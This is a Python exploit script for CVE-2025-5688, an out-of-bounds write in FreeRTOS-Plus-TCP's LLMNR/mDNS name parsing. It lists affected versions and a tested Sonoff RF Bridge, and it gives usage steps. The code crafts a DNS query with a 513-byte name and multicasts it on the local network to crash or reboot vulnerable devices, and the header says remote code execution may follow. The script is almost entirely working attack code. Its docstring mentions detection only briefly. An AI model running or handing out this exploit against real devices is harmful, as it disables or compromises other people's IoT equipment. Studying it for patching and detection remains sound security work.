#!/usr/bin/env python3
# Exploit Title: FreeRTOS-Plus-TCP <= 4.3.1 Out-of-Bounds Write in LLMNR/mDNS Name Parsing
# CVE: CVE-2025-5688
# Date: 2025-12-26
# Exploit Author: Mohammed Idrees Banyamer
# Author Country: Jordan
# Instagram: @banyamer_security
# Author GitHub:
# Vendor Homepage: https://www.freertos.org
# Software Link: https://github.com/FreeRTOS/FreeRTOS-Plus-TCP
# Affected:
#   FreeRTOS-Plus-TCP <= 4.3.1
#   LLMNR or mDNS enabled
#   Buffer Allocation Scheme 1
# Tested on: Sonoff RF Bridge (vulnerable firmware), custom FreeRTOS devices
# Category: Remote
# Platform: Embedded / IoT
# Exploit Type: Denial of Service / Potential Remote Code Execution
# CVSS: 8.4 (High)
# Description: Out-of-bounds write when parsing very long DNS names in LLMNR or mDNS queries
# Fixed in: FreeRTOS-Plus-TCP 4.3.2
# Usage:
#   python3 exploit.py [LLMNR|mDNS] [optional multicast IP]
#
# Examples:
#   python3 exploit.py LLMNR
#   python3 exploit.py mDNS 224.0.0.251
#
# Options:
#   --
#
# Notes:
#   • Triggers crash/reboot on many unpatched Sonoff RF Bridge devices and similar IoT hardware
#   • Requires target to be on the same LAN and have LLMNR or mDNS enabled
#
# How to Use
#
# Step 1: Place the vulnerable device (e.g.
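# Sonoff RF Bridge) on the same local network
#
# Step 2: Run the script targeting LLMNR or mDNS multicast address
#
# ────────────────────────────────────────────────
import socket
import sys

USAGE = "Usage: python3 exploit.py [LLMNR|mDNS] [optional multicast IP]"


def send_overlong_name(target_multicast="224.0.0.252", port=5355, protocol="LLMNR"):
    """Send one DNS-format query carrying an over-long QNAME to a multicast group.

    The question name is eight labels of 63 ``A`` bytes each (length byte
    0x3f followed by the 63 bytes), closed by the root terminator:
    8 * (1 + 63) + 1 = 513 bytes, far beyond the 255-octet maximum that
    RFC 1035 allows for a name.  The rest of the datagram is a minimal
    standard query: one question, QTYPE A, QCLASS IN.  ``protocol`` only
    changes the log label; the payload is the same for LLMNR and mDNS, the
    caller picks the matching group and port.

    Detection/mitigation: on the wire this is a single UDP datagram to
    5355 (LLMNR) or 5353 (mDNS) whose question name exceeds 255 octets,
    which a packet filter or IDS rule can match directly; the header
    names the release that fixes the parser.

    Args:
        target_multicast: destination IPv4 multicast group.
        port: destination UDP port (5355 for LLMNR, 5353 for mDNS).
        protocol: label printed in the progress messages.

    Returns:
        None.  The socket is always closed before returning.

    Raises:
        OSError: propagated from socket creation, setsockopt or sendto.
    """
    # Eight maximal-length labels, then the zero byte ending the name.
    long_qname = b"".join(b"\x3f" + b"A" * 63 for _ in range(8)) + b"\x00"
    header = (
        b"\xaa\xbb"  # transaction ID
        b"\x00\x00"  # flags: standard query, no recursion bits
        b"\x00\x01"  # QDCOUNT = 1
        b"\x00\x00"  # ANCOUNT = 0
        b"\x00\x00"  # NSCOUNT = 0
        b"\x00\x00"  # ARCOUNT = 0
    )
    question = long_qname + b"\x00\x01\x00\x01"  # QTYPE A, QCLASS IN
    packet = header + question
    print(f"[+] Sending {len(packet)}-byte {protocol} query → target {target_multicast}:{port}")
    # Context manager closes the descriptor even if sendto raises (the
    # original left it open).  Multicast TTL 2 keeps the datagram within
    # one router hop of the sender.
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 2)
        sock.sendto(packet, (target_multicast, port))
    print("[+] Sent. Watch for immediate crash, reboot, LED blink loop, or freeze.")


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(USAGE)
        sys.exit(1)
    proto = sys.argv[1].upper()
    # Reject unknown protocol names instead of silently treating them as mDNS.
    if proto not in ("LLMNR", "MDNS"):
        print(USAGE)
        sys.exit(1)
    # LLMNR and mDNS use different well-known groups and ports; the optional
    # third argument overrides the group only, the port follows the protocol.
    if proto == "LLMNR":
        multicast, port = "224.0.0.252", 5355
    else:
        multicast, port = "224.0.0.251", 5353
    if len(sys.argv) > 2:
        multicast = sys.argv[2]
    send_overlong_name(multicast, port, proto)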